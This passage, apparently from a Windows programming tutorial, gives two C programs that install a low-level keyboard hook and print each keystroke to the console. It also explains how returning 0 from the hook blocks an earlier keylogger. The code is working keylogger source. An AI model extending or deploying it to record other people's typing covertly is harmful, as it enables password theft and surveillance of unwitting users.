Keystroke Loggers

 

#define _WIN32_WINNT 0x0400

#include <windows.h>

MSG m;HINSTANCE h;HHOOK k;char aa[100];KBDLLHOOKSTRUCT o;int i,key;

__declspec(dllexport) int __stdcall zzz(int code,unsigned int w,long l)

{

KBDLLHOOKSTRUCT *o1;

o = *((KBDLLHOOKSTRUCT*)l);

key = o.scanCode << 16;

key += o.flags << 24;

GetKeyNameText(key,aa,100);

if ( o.flags == 0)

printf("%s",aa);

printf(" Code is %d\n",code);

if ( code < 0 )

return CallNextHookEx(0,code,w,l);

else

return 0;

}

main(int argc , char *argv[])

{

printf("%d\n",HC_NOREMOVE);

h = GetModuleHandle(0);

k = SetWindowsHookEx (WH_KEYBOARD_LL,zzz,h,0); //WH_KEYBOARD_LL=13

while (GetMessage(&m,0,0,0))

DispatchMessage( &m );

}

 

In the earlier code, we simply called the next hook procedure. The value of code is normally 0. If we return 0, we are telling windows not to call the next windows hook function. Thus we first run the original keystroke logger, then we run the above logger. This will effectively block the first keystroke logger. When we quit out of the above logger, then the first one gets reactivated. This is a very simple way of disabling  a keystroke logger after they have been run.

 

The next program is the smallest keystroke logger with all the frills removed.

 

#define _WIN32_WINNT 0x0400

#include <windows.h>

MSG m;char aa[100];int i,key;

__declspec(dllexport) int __stdcall zzz(int code,unsigned int w,long l)

{

KBDLLHOOKSTRUCT *o1 = (KBDLLHOOKSTRUCT*) l;

key = o1->scanCode << 16;

key += o1->flags << 24;

GetKeyNameText(key,aa,100);

if ( o1->flags == 0)

printf("%s",aa);

return CallNextHookEx(0,code,w,l);

}

main(int argc , char *argv[])

{

SetWindowsHookEx (WH_KEYBOARD_LL,zzz,0x400000,0);

while (GetMessage(&m,0,0,0))

DispatchMessage( &m );

}